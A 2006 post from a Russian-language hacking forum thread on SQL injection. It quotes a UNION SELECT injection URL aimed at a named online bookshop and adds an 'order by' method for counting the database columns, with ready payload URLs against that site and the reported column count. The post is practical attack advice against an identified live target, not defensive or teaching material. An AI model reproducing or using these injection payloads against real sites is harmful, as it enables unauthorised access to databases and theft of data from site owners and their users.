Тема: SQL-injection
Показать сообщение отдельно

  #3  
Старый 02.05.2006, 13:46
Deem3n®
Постоянный
Регистрация: 19.09.2005
Сообщений: 408
С нами: 10863746

Репутация: 519
По умолчанию

Цитата:
Сообщение от virgoz  
http://kniga.com.ua/index.php?Lev=product_info&id=-883'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20/*
[flame]
в этом случае проще количество столбцов перебирать вот таким способом:
__http://site.com/index.php?Lev=product_info&id=-1'+order by x/*
x = 1 ... n
Если при x = n вылетает ошибка то количество столбцов n-1
В этом случае ошибка вылетает при х=21
http://kniga.com.ua/index.php?Lev=product_info&id=-883' order by 21/*
[/flame]
ЗЫ: сорри за флейм просто не удержался и запостил когда увидел такую длинную ссылку
 
Ответить с цитированием